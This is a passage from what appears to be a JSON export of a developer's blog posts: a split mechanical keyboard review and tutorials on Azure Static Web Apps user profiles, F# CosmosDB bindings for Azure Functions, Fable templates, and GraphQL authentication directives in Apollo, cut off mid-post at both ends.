I’ve ever really spent much time thinking about it or the role that it plays in how I work.\nOne of the first keyboards I remember using was a huge beige thing with a curly cable into the 9-pin port. Then, as I started working it was just whatever keyboard I had at work, basic keyboards that you’re likely familiar with from corporate environments. When I started consulting and speaking, my main machine was a laptop and because I didn’t want to drag keyboards around to client sites, I would just use the keyboard on my laptop… and I loved those. Probably my favourite laptop keyboard is the Surface Book 2, followed closely by the Surface Pro type cover.\nWith last year seeing me move to full time working from home, I got myself a desktop and with that I needed an external keyboard.\nThankfully, I did have one that I’d used on and off, a Microsoft Natural 4000!\nMy first ergonomic keyboard I bought this keyboard about a decade ago, on my first trip to Microsoft as an MVP, mainly on a whim, but it’s mostly sat on the shelf collecting dust (due to the above mentioned reasons for not using an external keyboard). Anyway, I dusted it off and have been using it for about 12 months now.\nThis was the first time I’d used an ergonomic keyboard and I didn’t really know why I wanted it other than “it seemed like a fun experiment”. It took a little bit to get use to but, generally speaking, it was no different to any other keyboard I’d used. They keys felt nice, but not anything special.\nUnfortunately, this is a 10 year old keyboard and it was starting to wear out, the wrist rests are starting to crack and peal, plus the years of dust collecting on it have made some of the keys a bit sticky at times.\nIt was time for a new keyboard.\nThe MS Natural 4000 is no longer available, so I needed to work out what I’d get as a replacement. Should I go with one of the current generation MS ergonomic keyboards, or should I go elsewhere?\nI’d seen a few people on Twitter talking about split keyboards, and that intrigued me, so I started to look at them. One model that kept popping up is the ZSA Moonlander.\nAfter some umm-ing and ahh-ing I decided to take the plunge and ordered it.\nWhy split? So the first question you might have is, why a split keyboard?\nWell, I’m already kind of using a split keyboard, the position of the keys in the MS Natural 4000 are already curved and separated, compared to a standard keyboard. The next reason is ergonomics.\nI’m a tall person, and having a desk job means that I spend a lot of time in a less than idea ergonomic position and occasionally get shoulder and neck pain as a result (not to mention that I can pop most joints in my hands at will!). With a standard keyboard you tend to rotate your shoulders and hands in to use them, as seen when I use my laptop keyboard.\nSee how my arms are angled on and wrists have a curve in them (particularly the left).\nNow take a look at the hand position on the MS Natural 4000.\nHere my hands are a bit more spread and as a result my shoulders are more open, which is a more natural body position, but it’s still limited as I can’t move the keyboard any further apart than this and my wrists are still turned (it looks a bit weird in the photo due to the tenting on the keyboard making it not sit flat like the laptop one).\nIn a fully split keyboard, you can completely open up by moving each half of the keyboard to where is the most comfortable position for you.\nThis is the “optimal” position for the keyboard. Notice how my hands are in line with my shoulders, which is meant to be the ideal position for them. I’m not in a complete split yet, it’ll take time to get use to it.\nSo, what’s it like?\nFirst Impressions I’m on day four using it and if you’re following my Twitter stream you’ll have seen some of my journey, but here’s the highlights.\nMy First Mechanical Keyboard The ZSA Moonlander is a mechanical keyboard, which means you can feel superior to others by talking about different key switches, the pressure required for them, their pre-travel distance, etc.\nAs a newbie to this space I’ve gone with two sets of key switches. Currently, I have Kailh Gold in, which are a very light switch, but also a super loud one (clacking on both the up and down motion), so it’s probably a good thing I work from home (although right now we’re home schooling due to COVID, but my wife hasn’t said anything 😅 Update: my wife read this post and said “Oh, you can totally hear them. 🤣). I also have a set of Cherry MX Brown, which are apparently a great starting key switch, they aren’t too noisy, have a good feel, etc. I’ll give them a try after a few weeks, once I’m more use to the keyboard.\nDay 1 - I feel like an idiot The box arrived and I couldn’t believe how small it was!\nIt has a snazzy little carry case for if I take it travelling (cries in COVID).\nI slid my old keyboard off to the side and setup the Moonlander, plugged it in and it was time to get started.\nThe first thing I realised is that I wouldn’t be able to have it in the full split position, it was just too weird for me, so I brought the two halves a bit closer, more like the MS Natural, and now I could find where the keys were as I tried to type. It’s also an ortholinear layout, not staggered, meaning that the keys are lined up in vertical columns, unlike most keyboards, encouraging more up and down movement than side to side (here’s a good video talking of the differences and possible benefits of ortholinear).\nOne of the things that you can do with the Moonlander is customise the layout of the keyboard. Given I have less keys than before, no function row, no numpad, etc., if I want that functionality back in, I can customise it using their Oryx software. This was also useful as I had no idea what the keyboard layout originally was, like, where’s my Windows key, or backspace! It also supports the idea of keyboard layers, which is where you have different “modes” the keyboard can shift into, generally hitting some key, and changing what the keys do.\nThis was going to be a challenge…\nI started to play with Oryx but honestly, it’s super overwhelming. I have no idea what keyboard shortcuts I tend to use, which keys I hit frequently, etc. so trying to move things around just meant I ended up with a confusing keyboard layout (I deleted my Enter key at one point 🤣). Chad Tolkien, who gave me some good insights before I bought the keyboard, sent me a layout that he uses which includes some layers for coding. It was using Colemak, an alternative to QWERTY, so I modified it to be QWERTY and got going.\nTyping With my keyboard layout tweaked enough to get started, I began using it, and using a drastically different keyboard is a great way to learn just how many bad habits you have with typing.\nWhat I learn with my typing is that I rely heavily on my first and second fingers heavily, with my third sometimes coming into play and my pinky basically just being dead weight.\nI also learnt that my right hand is really sloppy at typing, and while my left was picking up the new key positions and what not, my right was full of incorrect characters. I’d made the choice the keep CTRL + Backspace next to the H key (from Chad’s layout), but I was constantly hitting it when meaning H, and I never realised how often I tried to type the letter H until I deleted the whole word with a single missed key… 😅\nThroughout the day I ran through the training exercises that Oryx providers and was hitting around 80% accuracy, but I was only getting about two lines into each of the pieces of text (maybe a dozen or so words) and that didn’t inspire confidence. I don’t know what my words-per-minute is, but I can crank out a blog post quick-smart if I need, so I’d say it’s better than the ~15 I was sitting at.\nYeah, I felt really dumb trying to type, but damnit, I’m going to learn!\nDay 2 - Feeling better On day 2 I started playing with the keyboard tenting, which is how you can raise the keyboard up. I like that the MS Natural 4000 wasn’t sitting flat on the desk and curved up at the middle, so I played around a bit with that on my Moonlander to get a position that felt right.\nI started doing more typing and it wasn’t feeling as horrible. I’ve got a talk upcoming so I did some work on the slides, which required some typing but nothing long, and I did some updating to my work backlog, general admin stuff, and things were feeling better.\nHere’s a video I posted on Twitter towards the end of day 2, showing me typing the tweet:\nWhile I retrain myself on how to type, I decided to setup a spare webcam to watch my hands as I go. This is totally trippy to watch yourself while your typing.\nBut hey, I get to see where my mistakes are!\n(video is of me typing this tweet, at double speed 🤣) pic.twitter.com/KfnByv7929\n— Aaron Powell (@slace) July 27, 2021 That tweet took about 45 seconds to type, which didn’t feel too bad… You’ll see me backspace a few times though!\nDay 3 - Coding After two days I felt like I was getting the hang of this usual typing stuff, it was time to do some coding.\nAaaaaaaaaaaaaaaand back to square one 🤣.\nI never realised how muscle memory I have in coding, where the symbols are, how to use tools like VS and VS Code, I just use them, I don’t even think.\nBut now I don’t have the symbol keys where I would expect them to be, I have layers that have them, and it’s just weird.\nThis is something that I’m likely going to keep playing with for a while, I need to work out what to put where, and how my fingers tend to think about movement, but I was able to struggle through what I wanted to do, even if I felt like it was taking absolutely ages.\nI now have some customised layers on the keyboard for VS Code and VS, containing the useful shortcuts that I use, but I do find the macro system in Oryx limiting, I wish I could have longer sets of keys so in VS Code I could do CTRL + P, TERM<SPACE> to access the terminal list, but I can only get it to do TERM. That’ll have to do for now.\nConclusion It’s been less than a week but when it comes to word-centric typing, I feel like I’m getting my stride back, coding is going to take a bit longer, mainly because there are so many variables (ha!) to that, but I’m sure I’ll get there (this week hasn’t been a code-centric week for me).\nI’m finding the mechanical nature of the keys nice, and I’d probably rate this above the Surface Book 2 keyboard. I’ll keep the Kailh Gold’s in for a few weeks before trying the Cherry MX Brown, although the clacky sound is growing on me.\nIf you’re interested in the keyboard layout I’m using, here it is, feel free to give it a try, I’ll keep tweaking it as I go.\nAnd of course, I have some lovely RGB involved, because if there’s no RGB, what’s the point!\n", "id": "2021-07-29-keyboard-first-impressions-zsa-moonlander" }, { "title": "Adding User Profiles to Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-07-16-adding-user-profiles-to-swa/", "date": "Fri, 16 Jul 2021 04:48:26 +0000", "tags": [ "javascript", "azure", "serverless" ], "description": "SWA gives you authentication, but without much of a user profile, so let's look at how to add that.", "content": "With Azure Static Web Apps we get a user profile as part of the security platform, but that profile is pretty limited, we get an ID for the user and something contextual from the authentication provider, like an email address or a username. This means that if we want to create a more enriched user profile, we need to do it ourselves.\nSo, let’s take a look at how we can do that. For this demo, I’m going to use the React SWA template, the npm package @aaronpowell/react-static-web-apps-auth and @aaronpowell/static-web-apps-api-auth. We’re also only going to use GitHub as the authentication provider, but the pattern displayed here is applicable to any authentication provider (you’d just need to figure out the appropriate APIs).\nAuthenticating a user First we’re going to need some way to log the user in, or at least, checking that they are logged in, so we’ll wrap the whole application in the ClientPrincipalContextProvider component:\n1 2 3 4 5 6 7 8 9 // updated index.jsx ReactDOM.render( <React.StrictMode> <ClientPrincipalContextProvider> <App /> </ClientPrincipalContextProvider> </React.StrictMode>, document.getElementById("root") ); Having this ContextProvider means that we’ll be able to use the useClientPrincipal React Hook (which the package ships with) to check if the user is logged in or not within our application, and that’ll be critical to make the right decisions throughout the app.\nLet’s rewrite the App component to use the useClientPrincipal hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 function App() { const details = useClientPrincipal(); if (!details.loaded) { return ( <section> <h1>Loading...</h1> </section> ); } // todo return null; } The loaded property of the Hook state is indicating whether or not we’re received a response from the /.auth/me endpoint, which is what we use to determine if someone is authenticated to our app, if they’re authenticated, we’ll get the standard profile back, if not, we’ll get a null profile. Once this has completed we can check for a clientPrincipal:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 function App() { const details = useClientPrincipal(); if (!details.loaded) { return ( <section> <h1>Loading...</h1> </section> ); } if (!details.clientPrincipal) { return <Login />; } // todo return null; } We’ll create a basic Login component that:\n1 2 3 4 5 6 7 8 function Login() { return ( <section> <h1>Login</h1> <StaticWebAuthLogins azureAD={false} twitter={false} /> </section> ); } This uses the component from @aaronpowell/react-static-web-apps-auth and disabled Azure AD and Twitter, which are part of the pre-configured providers.\nGetting the GitHub user info Before we can finish off the UI component, we need some way in which we can get the user’s information from GitHub. Let’s do that by adding a new API to our SWA:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import fetch, { Headers } from "node-fetch"; import { getUserInfo, isAuthenticated } from "@aaronpowell/static-web-apps-api-auth"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { if (!isAuthenticated(req)) { context.res = { status: 401 }; return; } const userInfo = getUserInfo(req); const headers = new Headers(); headers.append("accept", "application/json"); headers.append("user-agent", "azure-functions"); headers.append( "authorization", `Basic ${Buffer.from( `${process.env.GitHubUsername}:${process.env.GitHubToken}` ).toString("base64")}` ); const res = await fetch( `https://api.github.com/users/${userInfo.userDetails}`, { headers } ); if (!res.ok) { const body = await res.text(); context.res = { status: res.status, body }; return; } const { login, avatar_url, html_url, name, company, blog, location, bio, twitter_username } = await res.json(); context.res = { body: { login, avatar_url, html_url, name, company, blog, location, bio, twitter_username } }; }; export default httpTrigger; The first thing this function is going to do is check that there is a logged in user, using the isAuthenticated function from the @aaronpowell/static-web-apps-api-auth package (you don’t need to do this if you configure SWA to require the call to be authenticated, but I tend to do it out of habit anyway).\nAssuming they are logged in, we’ll make a call to the GitHub API to get the user’s details. It’d be a good idea to provide an authentication token to do this, so you don’t get rate limited. Aside: I’m using Buffer.from("...").toString("base64") not btoa to do the encoding, as at the time of writing the API that SWA deploys runs Node.js ~12, and btoa was added to Node.js in ~14.\nHow do we know the user to access? The clientPrincipal that we get back has the userDetails field set to the GitHub username, so we can use that in the API call.\nAnd then assuming that’s successful, we’ll return the fields that are we care about back to the client.\n<GitHubIdentityContextProvider> We’re going to build a new React Context (+ Provider) so that we can finish off our App like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 function App() { const details = useClientPrincipal(); if (!details.loaded) { return ( <section> <h1>Loading...</h1> </section> ); } if (!details.clientPrincipal) { return <Login />; } return ( <GitHubIdentityContextProvider> <User /> </GitHubIdentityContextProvider> ); } We’ll create a new file called GitHubIdentityContextProvider.tsx and start creating our context provider:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import { useClientPrincipal } from "@aaronpowell/react-static-web-apps-auth"; import React, { createContext, useContext } from "react"; type GitHubUser = { login: string; avatar_url: string; html_url: string; name: string; company: string; blog: string; location: string; bio: string; twitter_username: string; }; const GitHubIdentityContext = createContext<GitHubUser | null>(null); First thing, let’s create a TypeScript type for the user, obviously skip this if you’re not using TypeScript.\nWe’ll then create our React Context using createContext and call it GitHubIdentityContext. We’re not going to export this from the module, as we don’t want people creating their own providers using it, we want to do that for them, so we can control how it populates the profile data.\nNow for the Context Provider:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 const GitHubIdentityContextProvider = ({ children }: any) => { const swaUser = useClientPrincipal(); const [githubUser, setGitHubUser] = React.useState<GitHubUser | null>(null); React.useEffect(() => { if (swaUser.loaded && swaUser.clientPrincipal) { fetch("/api/user-details") .then(res => res.json()) .then(setGitHubUser); } }, [swaUser]); return ( <GitHubIdentityContext.Provider value={githubUser}> {children} </GitHubIdentityContext.Provider> ); }; The GitHubIdentityContextProvider is a React Component, which uses the useClientPrincipal Hook and tracks the GitHub user details as local state. We’ll use an effect Hook to wait for the profile to be loaded, and if it has been, call the new API that we created earlier in this post (I called mine user-details). Unpack the response as JSON and push it into state, now we have the GitHub user info available to our client.\nLastly, we’ll create a custom Context Hook to expose this and export them from our module.\n1 2 3 const useGitHubUser = () => useContext(GitHubIdentityContext); export { GitHubIdentityContextProvider, useGitHubUser }; The <User /> component With the GitHub profile ready, we can create a <User /> component to render the information out:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 function User() { const githubUser = useGitHubUser(); if (!githubUser) { return null; } return ( <div> <h1>{githubUser.name}</h1> <h2> Works at {githubUser.company} in {githubUser.location} </h2> <p>{githubUser.bio}</p> <ul> <li> <a href={githubUser.html_url}>Profile</a> </li> <li> <a href={`https://twitter.com/${githubUser.twitter_username}`} > Twitter </a> </li> <li> <Logout /> </li> </ul> </div> ); } With a null check to ensure it isn’t used in the wrong place (and to satisfy the TypeScript compiler that we aren’t using a null object 😜) we can dump out the profile in whatever format we want.\nAnd there we have it, an Azure Static Web App with authentication provided by GitHub, along with a rich user profile.\nYou can check out the full sample on my GitHub, along with a deployed version of the sample.\nError loading GitHub repo\nConclusion Static Web Apps does a good job of giving us the building blocks for creating an authenticated experience. In this post we’ve looked at how we can take those building blocks and create a rich user profile, provided by the underlying GitHub API.\nAlthough this sample is GitHub centric, there’s no reason you can’t apply the pattern against any other authentication provider, including custom ones. You could even make an API that looks at the identityProvider property of the clientPrincipal and call Azure AD, Twitter, or any other provider in use.\nI’d also suggest that you explore how you can effectively cache this data locally, either in a user store in Azure, or in the browser using localStorage or sessionStorage, but there are privacy considerations and data purging to think of, which is beyond the scope of what I wanted to cover in this post.\nHopefully this helps you create apps with richer user profiles.\n", "id": "2021-07-16-adding-user-profiles-to-swa" }, { "title": "Azure Functions, F# and CosmosDB Output Bindings", "url": "https://www.aaron-powell.com/posts/2021-07-11-functions-cosmosdb-output-bindings-and-fsharp/", "date": "Sun, 11 Jul 2021 23:25:38 +0000", "tags": [ "serverless", "azure", "functions", "dotnet", "fsharp" ], "description": "Let's look at how to work with Azure Functions output bindings from F#, specifically for CosmosDB", "content": "While building the demo application from last weeks On .NET Live stream I was needing to do some writing of data to CosmosDB and figured I’d use the output bindings. With the docs only containing C# examples (at least, at the time of writing), I thought I’d use this post to show how to do it in F#.\nout arguments One way which we can use an output binding is to have an out argument, essentially somewhere that you’re passing a reference to a variable that the host will send to CosmosDB. Since out is a C# keyword we need to use the F# equivalent, which is outref<T>:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 namespace Demo type ToDo = { Id: string Description: string } module CreateToDo = [<FunctionName("CreateGame")>] let run ([<QueueTrigger("todoqueueforwrite")>] queueMessage: string), ([<CosmosDB("ToDoItems", "Items", ConnectionStringSetting = "CosmosConnection")>] todo: outref<ToDo>) (log: ILogger) = todo <- { Id = Guid.NewGuid().ToString(); Description = queueMessage } log.LogInformation "F# Queue trigger function inserted one row" log.LogInformation (sprintf "Description=%s" queueMessage); In this example, we have the outref<ToDo> as the second argument of our Function and we use the <- operator to do assignment to the mutable value (outref is a mutable reference, similar to let mutable makes a mutable binding).\nDealing with async Here’s a slightly more challenging problem, if you’re doing something that’s requiring an asynchronous process to happen, like reading the request body, and then writing to the output binding, we can’t use outref<T>, as the way async operations work (whether it’s Task or Async based) means that you can’t capture an outref parameter (nor in C# can you use an out parameter in an async function).\nThis is what the IAsyncCollector<T> is for, it gives us an interface which we can push output to from within an async operation.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 namespace Demo type ToDo = { Id: string Description: string } module CreateToDo = [<FunctionName("CreateGame")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = null)>] req: HttpRequest) ([<CosmosDB("ToDoItems", "Items", ConnectionStringSetting = "CosmosConnection")>] todos: IAsyncCollector<ToDo>) (log: ILogger) = async { use stream = new StreamReader(req.Body) let! reqBody = stream.ReadToEndAsync() |> Async.AwaitTask do! { Id = Guid.NewGuid().ToString(); Description = reqBody } |> todos.AddAsync |> Async.AwaitIAsyncResult |> Async.Ignore return OkResult() } |> Async.AwaitTask In this example, we’re reading the req.Body stream and then creating a new record that is passed to the IAsyncCollector.AddAsync, and since it returns Task, not Task<T>, we need to ignore the result.\nLastly, we convert the async block to Task<T> using Async.AwaitTask, since the Functions host requires Task<T> to be returned. You could optimise this code using Ply or TaskBuilder.fs, but I kept it simple for this example.\nConclusion This post shows how we can use the CosmosDB output bindings for Azure Functions from F# in the two most common scenarios, outputting a single item directly or outputting an item as part of an async operation.\nYou’ll find a much more complete example in the demo app I built.\n", "id": "2021-07-11-functions-cosmosdb-output-bindings-and-fsharp" }, { "title": "Controlling Serialisation of CosmosDB Bindings for Azure Functions", "url": "https://www.aaron-powell.com/posts/2021-07-09-controlling-serialisation-of-cosmosdb-bindings-for-azure-functions/", "date": "Fri, 09 Jul 2021 04:29:50 +0000", "tags": [ "azure", "serverless", "azure-functions", "dotnet" ], "description": "Do you want to do changes to how CosmosDB serialises/deserialises data in the Azure Function bindings? Then have a read of this post.", "content": "While preparing the content for the live stream I did today I came across a problem with how the data in CosmosDB was being handled. The sample data set I was using was using camel-case for the field names, such as correctAnswer and incorrectAnswer, while the casing on the F# record types was pascal-case (CorrectAnswer and IncorrectAnswer), and this was causing problems in the serialisation/deserialisation of the data.\nSince I was using the input and output bindings for CosmosDB I don’t control the serialisation/deserialisation of the data, so how do we get around this?\nUnder the hood the bindings use Newtonsoft.Json and that has a singleton that we can set the global configuration on, but there’s a problem, where do we do that in a Functions project? we don’t control the startup of the Function, so how do we set the configuration?\nAfter some digging I came across the Microsoft.Azure.Functions.Extensions NuGet package (source) which provides an FunctionsStartup class. Now this looks promising.\nThis class gives us a method public abstract void Configure(IFunctionsHostBuilder builder) which will be executed when it initialises the Functions. One of the uses for this class is to do dependency injection, by adding services to the IFunctionsHostBuilder, but in our case we don’t need to do that, instead, we can use the method to setup our own configuration for JSON serialisation/deserialisation.\nHere’s the F# implementation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 module Startup open Microsoft.Azure.Functions.Extensions.DependencyInjection open Newtonsoft.Json open Newtonsoft.Json.Serialization open Newtonsoft.Json.Converters type Startup() = inherit FunctionsStartup() override _.Configure(_: IFunctionsHostBuilder) : unit = let settings = JsonSerializerSettings() settings.ContractResolver <- CamelCasePropertyNamesContractResolver() DiscriminatedUnionConverter() |> settings.Converters.Add StringEnumConverter() |> settings.Converters.Add JsonConvert.DefaultSettings <- (fun _ -> settings) [<assembly: FunctionsStartup(typeof<Startup>)>] do () In the Configure method we’re creating a new instance of the JsonSerializerSessions, setting the default contract resolver to be the CamelCasePropertyNamesContractResolver and then adding a few additional converters (to play nicer with F# types) before setting this as the default settings.\nTo make the Function host aware of this class we need to add the assembly-level attribute FunctionsStartup (with the typeof reference), and now we’re controlling how the input and output binding for CosmosDB works.\nHopefully this help you the next time you’re wanting to apply global configuration to Azure Functions.\n", "id": "2021-07-09-controlling-serialisation-of-cosmosdb-bindings-for-azure-functions" }, { "title": "Learn About F# and Web Development", "url": "https://www.aaron-powell.com/posts/2021-07-09-learn-about-fsharp-and-web-development/", "date": "Fri, 09 Jul 2021 03:43:33 +0000", "tags": [ "azure", "serverless", "fsharp", "web", "dotnet" ], "description": "Check out our live stream on F# and web development, with Fable and Azure Functions", "content": "Every week my colleague Cecil Philips hosts On .NET Live, an hour of live streaming about all things .NET.\nHe invited me on this week to talk about F# and web development, specifically how we can do serverless web development with F# and Azure Functions. This was a chance for me to show off some of the awesome community projects such as Fable and Feliz, which make it easy to build client-side JavaScript applications, but done using F#.\nWe talked about how to created Azure Functions with F#, I showed how you can get started using some GitHub repo templates to simplify a dev environment using Fable + Functions, and we finished by looking at an app I build using this stack and have deployed to Static Web Apps.\nCheck out the session on the dotnet YouTube channel.\n", "id": "2021-07-09-learn-about-fsharp-and-web-development" }, { "title": "Creating Static Web Apps With F# and Fable", "url": "https://www.aaron-powell.com/posts/2021-07-09-creating-static-web-apps-with-fsharp-and-fable/", "date": "Fri, 09 Jul 2021 00:56:43 +0000", "tags": [ "azure", "serverless", "web", "fsharp", "dotnet" ], "description": "Some templates to make it easier to get started with F# and Static Web Apps", "content": "While I’ve done lots of stuff with F# over the years, it’s pretty much all centred around apps on the server. With Azure Static Web Apps being a big area for myself these days I’ve been looking at the role that F# plays with it.\nThis led me to have a proper look at Fable. Fable is a F# to JavaScript compiler, meaning you can write F# code and have it compiled to JavaScript, which is then run in the browser (or in a Node.js/Electron/etc. but I’m focusing on the browser usage).\nSo, in an effort to make it easier to get started with Fable and Static Web Apps, I’ve put together three GitHub repo templates. All the templates have a common Azure Function backend (using F#), use Paket for dependency management, Vite for bundling the JavaScript (I wanted to avoid webpack), Thoth.Fetch for calling the API and a VS Code Remote Container config to setup an F# environment. For the client, there’s Fable, Feliz (a React DSL in F#) and Elmish (a Model-View-Update pattern).\nI’ve also included some instructions on deploying to SWA, as it’s a bit tricker than a normal app.\nCheck out the templates, and let me know if there’s anything you’d like to see in them to make it easier to get started with F# and Static Web Apps.\nError loading GitHub repo\nError loading GitHub repo\nError loading GitHub repo\n", "id": "2021-07-09-creating-static-web-apps-with-fsharp-and-fable" }, { "title": "GraphQL on Azure: Part 7 - Server-side Authentication", "url": "https://www.aaron-powell.com/posts/2021-07-05-graphql-on-azure-part-7-server-side-authentication/", "date": "Mon, 05 Jul 2021 01:51:57 +0000", "tags": [ "azure", "javascript", "graphql" ], "description": "It's time to talk authentication, and how we can do that with GraphQL on Azure", "content": "In our journey into GraphQL on Azure we’ve only created endpoints that can be accessed by anyone. In this post we’ll look at how we can add authentication to our GraphQL server.\nFor the post, we’ll use the Apollo Server and Azure Static Web Apps for hosting the API, mainly because SWA provides security (and if you’re wondering, this is how I came across the need to write this last post).\nIf you’re new to GraphQL on Azure, I’d encourage you to check out part 3 in which I go over how we can create a GraphQL server using Apollo and deploy that to an Azure Function, which is the process we’ll be using for this post.\nCreating an application The application we’re going to use today is a basic blog application, in which someone can authenticate against, create a new post with markdown and before saving it (it’ll just use an in-memory store). People can then comment on a post, but only if they are logged in.\nLet’s start by defining set of types for our schema:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 type Comment { id: ID! comment: String! author: Author! } type Post { id: ID! title: String! body: String! author: Author! comments: [Comment!]! comment(id: ID!): Comment } type Author { id: ID! userId: String! name: String! email: String } We’ll add some queries and mutations, along with the appropriate input types:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 type Query { getPost(id: ID!): Post getAllPosts(count: Int! = 5): [Post!]! getAuthor(userId: String!): Author } input CreatePostInput { title: String! body: String! authorId: ID! } input CreateAuthorInput { name: String! email: String userId: String! } input CreateCommentInput { postId: ID! authorId: ID! comment: String! } type Mutations { createPost(input: CreatePostInput!): Post! createAuthor(input: CreateAuthorInput!): Author! createComment(input: CreateCommentInput!): Post! } schema { query: Query mutation: Mutations } And now we have our schema ready to use. So let’s talk about authentication.\nAuthentication in GraphQL Authentication in GraphQL is an interesting problem, as the language doesn’t provide anything for it, but instead relies on the server to provide the authentication and for you to work out how that is applied to the queries and mutations that schema defines.\nApollo provides some guidance on authentication, through the use of a context function, that has access to the incoming request. We can use this function to unpack the SWA authentication information and add it to the context object. To get some help here, we’ll use the @aaronpowell/static-web-apps-api-auth library, as it can tell us if someone is logged in and unpack the client principal from the header.\nLet’s implement a context function to add the authentication information from the request (for this post, I’m going to skip over some of the building blocks and implementation details, such as how resolvers work, but you can find them in the complete sample at the end):\n1 2 3 4 5 6 7 8 9 10 const server = new ApolloServer({ typeDefs, resolvers, context: ({ request }: { request: HttpRequest }) => { return { isAuthenticated: isAuthenticated(request), user: getUserInfo(request) }; } }); Here we’re using the npm package to set the isAuthenticated and user properties of the context, which works by unpacking the SWA authentication information from the header (you don’t need my npm package, it’s just helpful).\nApplying Authentication with custom directives This context object will be available in all resolvers, so we can check if someone is authenticated and the user info, if required. So now that that’s available, how do we apply the authentication rules to our schema? It would make sense to have something at a schema level to handle this, rather than a set of inline checks within the resolvers, as then it’s clear to someone reading our schema what the rules are.\nGraphQL Directives are the answer. Directives are a way to add custom behaviour to GraphQL queries and mutations. They’re defined in the schema, and can be applied to a type, field, argument or query/mutation.\nLet’s start by defining a directive that, when applied somewhere, requires a user to be authenticated:\n1 directive @isAuthenticated on OBJECT | FIELD_DEFINITION This directive will be applied to any type, field or argument, and will only be applied if the isAuthenticated property of the context is true. So, where shall we use it? The logical first place is on all mutations that happen, so let’s update the mutation section of the schema:\n1 2 3 4 5 type Mutations @isAuthenticated { createPost(input: CreatePostInput!): Post! createAuthor(input: CreateAuthorInput!): Author! createComment(input: CreateCommentInput!): Post! } We’ve now added @isAuthenticated to the Mutations Object Type in the schema. We could have added it to each of the Field Definitions, but it’s easier to just add it to the Mutations Object Type, want it on all mutations. Right now, we don’t have any query that would require authentication, so let’s just stuck with the mutation.\nImplementing a custom directive Defining the Directive in the schema only tells GraphQL that this is a thing that the server can do, but it doesn’t actually do anything. We need to implement it somehow, and we do that in Apollo by creating a class that inherits from SchemaDirectiveVisitor.\n1 2 3 import { SchemaDirectiveVisitor } from "apollo-server-azure-functions"; export class IsAuthenticatedDirective extends SchemaDirectiveVisitor {} As this directive can support either Object Types or Field Definitions we’ve got two methods that we need to implement:\n1 2 3 4 5 6 7 8 9 10 11 12 import { SchemaDirectiveVisitor } from "apollo-server-azure-functions"; export class IsAuthenticatedDirective extends SchemaDirectiveVisitor { visitObject(type: GraphQLObjectType) {} visitFieldDefinition( field: GraphQLField<any, any>, details: { objectType: GraphQLObjectType; } ) {} } To implement these methods, we’re going to need to override the resolve function of the fields, whether it’s all fields of the Object Type, or a single field. To do this we’ll create a common function that will be called:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import { SchemaDirectiveVisitor } from "apollo-server-azure-functions"; export class IsAuthenticatedDirective extends SchemaDirectiveVisitor { visitObject(type: GraphQLObjectType) { this.ensureFieldsWrapped(type); type._authRequired = true; } visitFieldDefinition( field: GraphQLField<any, any>, details: { objectType: GraphQLObjectType; } ) { this.ensureFieldsWrapped(details.objectType); field._authRequired = true; } ensureFieldsWrapped(objectType: GraphQLObjectType) {} } You’ll notice that we always pass in a GraphQLObjectType (either the argument or unpacking it from the field details), and that’s so we can normalise the wrapper function for all the things we need to handle. We’re also adding a _authRequired property to the field definition or object type, so we can check if authentication is required.\nNote: If you’re using TypeScript, as I am in this codebase, you’ll need to extend the type definitions to have the new fields as follows:\n1 2 3 4 5 6 7 8 9 10 11 12 import { GraphQLObjectType, GraphQLField } from "graphql"; declare module "graphql" { class GraphQLObjectType { _authRequired: boolean; _authRequiredWrapped: boolean; } class GraphQLField<TSource, TContext, TArgs = { [key: string]: any }> { _authRequired: boolean; } } It’s time to implement ensureFieldsWrapped:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 ensureFieldsWrapped(objectType: GraphQLObjectType) { if (objectType._authRequiredWrapped) { return; } objectType._authRequiredWrapped = true; const fields = objectType.getFields(); for (const fieldName of Object.keys(fields)) { const field = fields[fieldName]; const { resolve = defaultFieldResolver } = field; field.resolve = isAuthenticatedResolver(field, objectType, resolve); } } We’re going to first check if the directive has been applied to this object already or not, since the directive might be applied multiple times, we don’t need to wrap what’s already wrapped.\nNext, we’ll get all the fields off the Object Type, loop over them, grab their resolve function (if defined, otherwise we’ll use the default GraphQL field resolver) and then wrap that function with our isAuthenticatedResolver function.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 const isAuthenticatedResolver = ( field: GraphQLField<any, any>, objectType: GraphQLObjectType, resolve: typeof defaultFieldResolver ): typeof defaultFieldResolver => (...args) => { const authRequired = field._authRequired || objectType._authRequired; if (!authRequired) { return resolve.apply(this, args); } const context = args[2]; if (!context.isAuthenticated) { throw new AuthenticationError( "Operation requires an authenticated user" ); } return resolve.apply(this, args); }; This is kind of like partial application, but in JavaScript, we’re creating a function that takes some arguments and in turn returns a new function that will be used at runtime. We’re going to pass in the field definition, the object type, and the original resolve function, as we’ll need those at runtime, so this captures them in the closure scope for us.\nFor the resolver, it is going to look to see if the field or object type required authentication, if not, return the result of the original resolver.\nIf it did, we’ll grab the context (which is the 3rd argument to an Apollo resolver), check if the user is authenticated, and if not, throw an AuthenticationError, which is provided by Apollo, and if 